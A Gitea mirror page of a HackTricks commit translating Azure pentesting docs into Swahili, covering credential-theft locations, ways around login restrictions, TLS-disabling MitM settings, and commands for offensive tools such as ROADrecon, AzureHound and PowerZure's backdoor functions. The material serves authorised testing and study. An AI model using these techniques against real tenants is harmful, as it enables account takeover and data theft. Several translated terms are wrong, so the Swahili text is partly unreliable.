gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-12 04:55:32 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:26:13 +00:00
parent 44da2ea78f
commit 6f74ac1a76
245 changed files with 9102 additions and 11816 deletions
Download Patch File Download Diff File Expand all files Collapse all files

118
src/pentesting-cloud/azure-security/README.md
View File

@@ -10,46 +10,46 @@ az-basic-information/
## Azure Pentester/Red Team Methodology
In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected.
Ili kukagua mazingira ya AZURE ni muhimu sana kujua: ni **huduma zipi zinatumika**, nini kinachoweza **kuonyeshwa**, nani ana **ufikiaji** wa nini, na jinsi huduma za ndani za Azure na **huduma za nje** zinavyounganishwa.
From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that:
Kutoka kwa mtazamo wa Red Team, **hatua ya kwanza ya kuathiri mazingira ya Azure** ni kupata **akikazi** za Azure AD. Hapa kuna mawazo kadhaa juu ya jinsi ya kufanya hivyo:
- **Leaks** in github (or similar) - OSINT
- **Social** Engineering
- **Password** reuse (password leaks)
- Vulnerabilities in Azure-Hosted Applications
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
- **Local File Read**
- `/home/USERNAME/.azure`
- `C:\Users\USERNAME\.azure`
- The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
- The file **`azureProfile.json`** contains **info** about logged user.
- **`az logout`** removes the token.
- Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
Use `Disconnect-AzAccount` to remove them.
- 3rd parties **breached**
- **Internal** Employee
- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
- [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
- **Mvujo** katika github (au sawa) - OSINT
- **Uhandisi** wa Kijamii
- **Tumia tena** nywila (mvujo wa nywila)
- Uthibitisho katika Maombi ya Azure-Hosted
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) yenye ufikiaji wa metadata endpoint
- **Kusoma Faili za Mitaa**
- `/home/USERNAME/.azure`
- `C:\Users\USERNAME\.azure`
- Faili **`accessTokens.json`** katika `az cli` kabla ya 2.30 - Jan2022 - ilihifadhi **tokens za ufikiaji kwa maandiko wazi**
- Faili **`azureProfile.json`** ina **habari** kuhusu mtumiaji aliyeingia.
- **`az logout`** inafuta token.
- Matoleo ya zamani ya **`Az PowerShell`** yalihifadhi **tokens za ufikiaji** kwa **maandiko** wazi katika **`TokenCache.dat`**. Pia inahifadhi **ServicePrincipalSecret** kwa **maandiko** wazi katika **`AzureRmContext.json`**. Cmdlet **`Save-AzContext`** inaweza kutumika kuhifadhi **tokens**.\
Tumia `Disconnect-AzAccount` kuondoa hizo.
- Watu wa 3rd **walivunja**
- **Mfanyakazi** wa Ndani
- [**Phishing ya Kawaida**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (akikazi au Oauth App)
- [Phishing ya Uthibitisho wa Kifaa](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it:
Hata kama huja **athiri mtumiaji yeyote** ndani ya tenant ya Azure unayoishambulia, unaweza **kusanya habari** kutoka kwake:
{{#ref}}
az-unauthenticated-enum-and-initial-entry/
{{#endref}}
> [!NOTE]
> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
> Baada ya kufanikiwa kupata akiba, unahitaji kujua **ni nani anayemiliki hizo akiba**, na **nini wana ufikiaji**, hivyo unahitaji kufanya uhesabu wa msingi:
## Basic Enumeration
> [!NOTE]
> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
> Kumbuka kwamba sehemu ya **sauti kubwa** ya uhesabu ni **kuingia**, si uhesabu yenyewe.
### SSRF
If you found a SSRF in a machine inside Azure check this page for tricks:
Ikiwa umepata SSRF katika mashine ndani ya Azure angalia ukurasa huu kwa mbinu:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
@@ -59,14 +59,14 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
<figure><img src="../../images/image (268).png" alt=""><figcaption></figcaption></figure>
In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place:
Katika hali ambapo una akiba halali lakini huwezi kuingia, hizi ni baadhi ya ulinzi wa kawaida ambao unaweza kuwepo:
- **IP whitelisting** -- You need to compromise a valid IP
- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
- **IP whitelisting** -- Unahitaji kuathiri IP halali
- **Geo restrictions** -- Tafuta mahali mtumiaji anaishi au ofisi za kampuni na pata IP kutoka jiji moja (au nchi angalau)
- **Browser** -- Labda ni kivinjari tu kutoka OS fulani (Windows, Linux, Mac, Android, iOS) kinachoruhusiwa. Jua ni OS ipi mwathirika/kampuni inatumia.
- Unaweza pia kujaribu **kuathiri akiba za Service Principal** kwani kawaida huwa na mipaka kidogo na kuingia kwake hakuchunguzwi sana
After bypassing it, you might be able to get back to your initial setup and you will still have access.
Baada ya kuipita, unaweza kuwa na uwezo wa kurudi kwenye mipangilio yako ya awali na bado utakuwa na ufikiaji.
### Subdomain Takeover
@@ -75,13 +75,12 @@ After bypassing it, you might be able to get back to your initial setup and you
### Whoami
> [!CAUTION]
> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
> Jifunze **jinsi ya kufunga** az cli, AzureAD na Az PowerShell katika sehemu ya [**Az - Entra ID**](az-services/az-azuread.md).
One of the first things you need to know is **who you are** (in which environment you are):
Moja ya mambo ya kwanza unahitaji kujua ni **wewe ni nani** (katika mazingira gani uko):
{{#tabs }}
{{#tab name="az cli" }}
```bash
az account list
az account tenant list # Current tenant info
@@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user
az ad signed-in-user list-owned-objects # Get owned objects by current user
az account management-group list #Not allowed by default
```
{{#endtab }}
{{#tab name="AzureAD" }}
```powershell
#Get the current session state
Get-AzureADCurrentSessionInfo
#Get details of the current tenant
Get-AzureADTenantDetail
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Get the information about the current context (Account, Tenant, Subscription etc.)
Get-AzContext
@@ -121,53 +116,49 @@ Get-AzResource
Get-AzRoleAssignment # For all users
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user
```
{{#endtab }}
{{#endtabs }}
> [!CAUTION]
> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
> Moja ya amri muhimu zaidi za kuhesabu Azure ni **`Get-AzResource`** kutoka Az PowerShell kwani inakuwezesha **kujua rasilimali ambazo mtumiaji wako wa sasa anaweza kuona**.
>
> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
> Unaweza kupata taarifa sawa katika **konsoli ya wavuti** ukitembelea [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) au kutafuta "All resources"
### ENtra ID Enumeration
By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\
You can find here a guide:
Kwa kawaida, mtumiaji yeyote anapaswa kuwa na **idhini ya kutosha kuhesabu** mambo kama vile, watumiaji, vikundi, majukumu, wahusika wa huduma... (angalia [idhini za AzureAD za kawaida](az-basic-information/#default-user-permissions)).\
Unaweza kupata hapa mwongozo:
{{#ref}}
az-services/az-azuread.md
{{#endref}}
> [!NOTE]
> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
> In the following section you can check some ways to **enumerate some common services.**
> Sasa kwamba una **taarifa fulani kuhusu akreditivu zako** (na ikiwa wewe ni timu nyekundu matumaini huja **gundulika**). Ni wakati wa kubaini ni huduma zipi zinatumika katika mazingira.\
> Katika sehemu ifuatayo unaweza kuangalia njia kadhaa za **kuhesabu huduma za kawaida.**
## App Service SCM
Kudu console to log in to the App Service 'container'.
Konsoli ya Kudu kuingia kwenye 'konteina' ya App Service.
## Webshell
Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account.
Tumia portal.azure.com na uchague shell, au tumia shell.azure.com, kwa bash au powershell. 'disk' ya shell hii inahifadhiwa kama faili ya picha katika akaunti ya hifadhi.
## Azure DevOps
Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets.
Azure DevOps ni tofauti na Azure. Ina hazina, mipangilio (yaml au toleo), bodi, wiki, na zaidi. Makundi ya Vigezo yanatumika kuhifadhi thamani za vigezo na siri.
## Debug | MitM az cli
Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
Kwa kutumia parameter **`--debug`** inawezekana kuona maombi yote ambayo chombo **`az`** kinatuma:
```bash
az account management-group list --output table --debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kufanya:
{{#tabs }}
{{#tab name="Bash" }}
```bash
export ADAL_PYTHON_SSL_NO_VERIFY=1
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080"
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
```
{{#endtab }}
{{#tab name="PS" }}
```bash
$env:ADAL_PYTHON_SSL_NO_VERIFY=1
$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
$env:HTTPS_PROXY="http://127.0.0.1:8080"
$env:HTTP_PROXY="http://127.0.0.1:8080"
```
{{#endtab }}
{{#endtabs }}
## Automated Recon Tools
## Zana za Upelelezi za Kiotomatiki
### [**ROADRecon**](https://github.com/dirkjanm/ROADtools)
```powershell
cd ROADTools
pipenv shell
@@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!"
roadrecon gather
roadrecon gui
```
### [Monkey365](https://github.com/silverhack/monkey365)
```powershell
Import-Module monkey365
Get-Help Invoke-Monkey365
@@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed
Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue
Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML
```
### [**Stormspotter**](https://github.com/Azure/Stormspotter)
```powershell
# Start Backend
cd stormspotter\backend\
@@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022!
python stormspotter\stormcollector\sscollector.pyz cli
# This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
```
### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound)
```powershell
# You need to use the Az PowerShell and Azure AD modules:
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
@@ -294,9 +275,7 @@ MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu
## All Azure AD Groups that are synchronized with On-Premise AD
MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n
```
### [Azucar](https://github.com/nccgroup/azucar)
```bash
# You should use an account with at least read-permission on the assets you want to access
git clone https://github.com/nccgroup/azucar.git
@@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials
# resolve the TenantID for an specific username
PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
```
### [**MicroBurst**](https://github.com/NetSPI/MicroBurst)
```
Import-Module .\MicroBurst.psm1
Import-Module .\Get-AzureDomainInfo.ps1
Get-AzureDomainInfo -folder MicroBurst -Verbose
```
### [**PowerZure**](https://github.com/hausec/PowerZure)
```powershell
Connect-AzAccount
ipmo C:\Path\To\Powerzure.psd1
@@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
# Administrator
$ Create-Backdoor, Execute-Backdoor
```
### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner)
```powershell
#Get-GraphTokens
@@ -398,9 +371,4 @@ Get-TenantID -Domain
#Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
Invoke-GraphRunner -Tokens $tokens
```
{{#include ../../banners/hacktricks-training.md}}

478
src/pentesting-cloud/azure-security/az-basic-information/README.md
View File

@@ -1,374 +1,370 @@
# Az - Basic Information
# Az - Taarifa za Msingi
{{#include ../../../banners/hacktricks-training.md}}
## Organization Hierarchy
## Muundo wa Shirika
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUcVrh1BpuQXN7RzGqoxrn-4Nm_sjdJU-dDTvshloB7UMQnN1mtH9N94zNiPCzOYAqE9EsJqlboZOj47tQsQktjxszpKvIDPZLs9rgyiObcZCvl7N0ZWztshR0ZddyBYZIAwPIkrEQ=s2048?key=l3Eei079oPmVJuh8lxQYxxrB" alt=""><figcaption><p><a href="https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png">https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png</a></p></figcaption></figure>
### Management Groups
### Vikundi vya Usimamizi
- It can contain **other management groups or subscriptions**.
- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group.
- **10,000 management** groups can be supported in a single directory.
- A management group tree can support **up to six levels of depth**. This limit doesnt include the root level or the subscription level.
- Each management group and subscription can support **only one parent**.
- Even if several management groups can be created **there is only 1 root management group**.
- The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**.
- All subscriptions within a single management group must trust the **same Entra ID tenant.**
- Inaweza kuwa na **vikundi vingine vya usimamizi au usajili**.
- Hii inaruhusu **kutekeleza udhibiti wa utawala** kama vile RBAC na Sera za Azure mara moja kwenye kiwango cha kundi la usimamizi na kuwa **na urithi** na usajili wote ndani ya kundi.
- **Vikundi 10,000 vya usimamizi** vinaweza kuungwa mkono katika directory moja.
- Mti wa kundi la usimamizi unaweza kuunga mkono **hadi viwango sita vya kina**. Kiwango hiki hakijumuishi kiwango cha mzizi au kiwango cha usajili.
- Kila kundi la usimamizi na usajili linaweza kuunga mkono **mzazi mmoja tu**.
- Hata kama vikundi vingi vya usimamizi vinaweza kuundwa **kuna kundi moja la usimamizi la mzizi tu**.
- Kundi la usimamizi la mzizi **linashikilia** **vikundi vingine vya usimamizi na usajili** na **halitaweza kuhamishwa au kufutwa**.
- Usajili wote ndani ya kundi moja la usimamizi lazima uamini **tenant ya Entra ID sawa**.
<figure><img src="../../../images/image (147).png" alt=""><figcaption><p><a href="https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png">https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png</a></p></figcaption></figure>
### Azure Subscriptions
### Usajili wa Azure
- Its another **logical container where resources** (VMs, DBs…) can be run and will be billed.
- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
- It **trust only one Entra ID** directory
- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
- Ni **konteina nyingine ya kimantiki ambapo rasilimali** (VMs, DBs…) zinaweza kuendeshwa na zitalipiwa.
- **Mzazi** wake daima ni **kundi la usimamizi** (na inaweza kuwa kundi la usimamizi la mzizi) kwani usajili hauwezi kuwa na usajili mwingine.
- Ina **aminika tu na directory moja ya Entra ID**
- **Ruhusa** zilizotumika kwenye kiwango cha usajili (au yoyote ya wazazi wake) zina **urithi** kwa rasilimali zote ndani ya usajili
### Resource Groups
### Vikundi vya Rasilimali
[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group.
[Kutoka kwenye hati:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) Kundi la rasilimali ni **konteina** inayoshikilia **rasilimali zinazohusiana** kwa suluhisho la Azure. Kundi la rasilimali linaweza kujumuisha rasilimali zote za suluhisho, au zile tu **rasilimali ambazo unataka kusimamia kama kundi**. Kwa ujumla, ongeza **rasilimali** zinazoshiriki **mzunguko sawa** kwenye kundi moja la rasilimali ili uweze kupeleka, kusasisha, na kufuta kwa urahisi kama kundi.
All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
Rasilimali zote lazima ziwe **ndani ya kundi la rasilimali** na zinaweza kumilikiwa tu na kundi moja na ikiwa kundi la rasilimali litafutwa, rasilimali zote ndani yake pia zitafutwa.
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1</a></p></figcaption></figure>
### Azure Resource IDs
### Vitambulisho vya Rasilimali za Azure
Every resource in Azure has an Azure Resource ID that identifies it.
Kila rasilimali katika Azure ina Vitambulisho vya Rasilimali za Azure vinavyoiainisha.
The format of an Azure Resource ID is as follows:
Muundo wa Vitambulisho vya Rasilimali za Azure ni kama ifuatavyo:
- `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this:
Kwa mashine ya virtual inayoitwa myVM katika kundi la rasilimali `myResourceGroup` chini ya kitambulisho cha usajili `12345678-1234-1234-1234-123456789012`, Vitambulisho vya Rasilimali za Azure vinaonekana kama ifuatavyo:
- `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
## Azure vs Entra ID vs Azure AD Domain Services
## Azure vs Entra ID vs Huduma za Kikoa za Azure AD
### Azure
Azure is Microsofts comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises.
Azure ni jukwaa la **kumbukumbu la kompyuta la Microsoft, linalotoa huduma mbalimbali**, ikiwa ni pamoja na mashine za virtual, hifadhidata, akili bandia, na uhifadhi. Inafanya kazi kama msingi wa kuendesha na kusimamia programu, kujenga miundombinu inayoweza kupanuka, na kuendesha kazi za kisasa katika wingu. Azure inatoa zana kwa wabunifu na wataalamu wa IT kuunda, kupeleka, na kusimamia programu na huduma kwa urahisi, ikihudumia mahitaji mbalimbali kutoka kwa makampuni ya kuanzishwa hadi makampuni makubwa.
### Entra ID (formerly Azure Active Directory)
### Entra ID (zamani Azure Active Directory)
Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others.
Entra ID ni huduma ya **usimamizi wa utambulisho na ufikiaji** inayotegemea wingu iliyoundwa kushughulikia uthibitishaji, idhini, na udhibiti wa ufikiaji wa mtumiaji. Inatoa ufikiaji salama kwa huduma za Microsoft kama vile Office 365, Azure, na programu nyingi za SaaS za wahusika wengine. Ikiwa na vipengele kama vile kuingia mara moja (SSO), uthibitishaji wa hatua nyingi (MFA), na sera za ufikiaji wa masharti miongoni mwa zingine.
### Entra Domain Services (formerly Azure AD DS)
### Huduma za Kikoa za Entra (zamani Azure AD DS)
Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments.
Huduma za Kikoa za Entra zinaongeza uwezo wa Entra ID kwa kutoa **huduma za kikoa zinazoweza kusimamiwa zinazofaa na mazingira ya jadi ya Windows Active Directory**. Inasaidia protokali za zamani kama vile LDAP, Kerberos, na NTLM, ikiruhusu mashirika kuhamasisha au kuendesha programu za zamani katika wingu bila kupeleka wakala wa kikoa wa ndani. Huduma hii pia inasaidia Sera za Kundi kwa usimamizi wa kati, na kuifanya iweze kutumika katika hali ambapo kazi za zamani au zinazotegemea AD zinahitaji kuwepo pamoja na mazingira ya kisasa ya wingu.
## Entra ID Principals
## Misingi ya Entra ID
### Users
### Watumiaji
- **New users**
- Indicate email name and domain from selected tenant
- Indicate Display name
- Indicate password
- Indicate properties (first name, job title, contact info…)
- Default user type is “**member**”
- **External users**
- Indicate email to invite and display name (can be a non Microsft email)
- Indicate properties
- Default user type is “**Guest**”
- **Watumiaji wapya**
- Onyesha jina la barua pepe na kikoa kutoka kwa tenant iliyochaguliwa
- Onyesha jina la kuonyesha
- Onyesha nenosiri
- Onyesha mali (jina la kwanza, cheo cha kazi, taarifa za mawasiliano…)
- Aina ya mtumiaji wa kawaida ni “**mwanachama**”
- **Watumiaji wa nje**
- Onyesha barua pepe ya kuwalika na jina la kuonyesha (inaweza kuwa barua pepe isiyo ya Microsoft)
- Onyesha mali
- Aina ya mtumiaji wa kawaida ni “**Mgeni**”
### Members & Guests Default Permissions
### Ruhusa za Kawaida za Wanachama na Wageni
You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to:
Unaweza kuangalia katika [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) lakini kati ya vitendo vingine mwanachama ataweza:
- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
- Invite Guests (_can be turned off_)
- Create Security groups
- Read non-hidden Group memberships
- Add guests to Owned groups
- Create new application (_can be turned off_)
- Add up to 50 devices to Azure (_can be turned off_)
- Kusoma watumiaji wote, Vikundi, Programu, Vifaa, Majukumu, Usajili, na mali zao za umma
- Kualika Wageni (_inaweza kuzuiwa_)
- Kuunda vikundi vya Usalama
- Kusoma uanachama wa Kundi usiofichwa
- Kuongeza wageni kwenye vikundi vilivyo na umiliki
- Kuunda programu mpya (_inaweza kuzuiwa_)
- Kuongeza vifaa hadi 50 kwenye Azure (_inaweza kuzuiwa_)
> [!NOTE]
> Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
> Kumbuka kwamba ili kuhesabu rasilimali za Azure mtumiaji anahitaji kibali maalum cha ruhusa.
### Users Default Configurable Permissions
### Ruhusa za Kawaida za Watumiaji
- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
- Register Applications: Default **Yes**
- Restrict non-admin users from creating tenants: Default **No**
- Create security groups: Default **Yes**
- Restrict access to Microsoft Entra administration portal: Default **No**
- This doesnt restrict API access to the portal (only web)
- Allow users to connect work or school account with LinkedIn: Default **Yes**
- Show keep user signed in: Default **Yes**
- Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
- Read other users: Default **Yes** (via Microsoft Graph)
- **Guests**
- **Guest user access restrictions**
- **Guest users have the same access as members** grants all member user permissions to guest users by default.
- **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
- **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
- **Guests can invite**
- **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
- **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
- **Only users assigned to specific admin roles can invite guest users**
- **No one in the organization can invite guest users including admins (most restrictive)**
- **External user leave**: Default **True**
- Allow external users to leave the organization
- **Wanachama (**[**hati**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
- Register Programu: Kawaida **Ndio**
- Zuia watumiaji wasio wasimamizi kuunda tenants: Kawaida **Hapana**
- Kuunda vikundi vya usalama: Kawaida **Ndio**
- Zuia ufikiaji wa lango la usimamizi la Microsoft Entra: Kawaida **Hapana**
- Hii haisimamii ufikiaji wa API kwa lango (tu wavuti)
- Ruhusu watumiaji kuunganisha akaunti za kazi au shule na LinkedIn: Kawaida **Ndio**
- Onyesha kuweka mtumiaji alisainiwa: Kawaida **Ndio**
- Zuia watumiaji kutoka kupona funguo za BitLocker kwa vifaa vyao vilivyo na umiliki: Kawaida Hapana (angalia kwenye Mipangilio ya Kifaa)
- Kusoma watumiaji wengine: Kawaida **Ndio** (kupitia Microsoft Graph)
- **Wageni**
- **Vikwazo vya ufikiaji wa mtumiaji mgeni**
- **Watumiaji wageni wana ufikiaji sawa na wanachama** inatoa ruhusa zote za mtumiaji mwanachama kwa watumiaji wageni kwa default.
- **Watumiaji wageni wana ufikiaji mdogo kwa mali na uanachama wa vitu vya directory (kawaida)** inazuia ufikiaji wa wageni kwa wasifu wao wenyewe wa mtumiaji kwa default. Ufikiaji wa watumiaji wengine na taarifa za kundi haukubaliwi tena.
- **Ufikiaji wa mtumiaji mgeni unazuiwa kwa mali na uanachama wa vitu vyao vya directory** ni wa kikomo zaidi.
- **Wageni wanaweza kuwalika**
- **Mtu yeyote katika shirika anaweza kuwalika watumiaji wageni ikiwa ni pamoja na wageni na wasimamizi (inayoeleweka zaidi) - Kawaida**
- **Watumiaji wanachama na watumiaji waliotolewa majukumu maalum ya usimamizi wanaweza kuwalika watumiaji wageni ikiwa ni pamoja na wageni wenye ruhusa za mwanachama**
- **Ni watumiaji pekee waliotolewa majukumu maalum ya usimamizi wanaweza kuwalika watumiaji wageni**
- **Hakuna mtu katika shirika anaweza kuwalika watumiaji wageni ikiwa ni pamoja na wasimamizi (inayoeleweka zaidi)**
- **Mtumiaji wa nje aondoke**: Kawaida **Kweli**
- Ruhusu watumiaji wa nje kuondoka katika shirika
> [!TIP]
> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
> Hata kama imezuiwa kwa kawaida, watumiaji (wanachama na wageni) wenye ruhusa zilizotolewa wanaweza kufanya vitendo vya awali.
### **Groups**
### **Vikundi**
There are **2 types of groups**:
Kuna **aina 2 za vikundi**:
- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
- This will have an **email address** with the domain of the EntraID tenant.
- **Usalama**: Aina hii ya kundi inatumika kutoa wanachama ufikiaji wa programu, rasilimali na kupewa leseni. Watumiaji, vifaa, wakala wa huduma na vikundi vingine vinaweza kuwa wanachama.
- **Microsoft 365**: Aina hii ya kundi inatumika kwa ushirikiano, ikitoa wanachama ufikiaji wa sanduku la barua lililotolewa, kalenda, faili, tovuti ya SharePoint, na kadhalika. Wanachama wa kundi wanaweza kuwa watumiaji pekee.
- Hii itakuwa na **anwani ya barua pepe** yenye kikoa cha tenant ya EntraID.
There are **2 types of memberships**:
Kuna **aina 2 za uanachama**:
- **Assigned**: Allow to manually add specific members to a group.
- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
- **Iliyotolewa**: Ruhusu kuongeza wanachama maalum kwa mkono kwenye kundi.
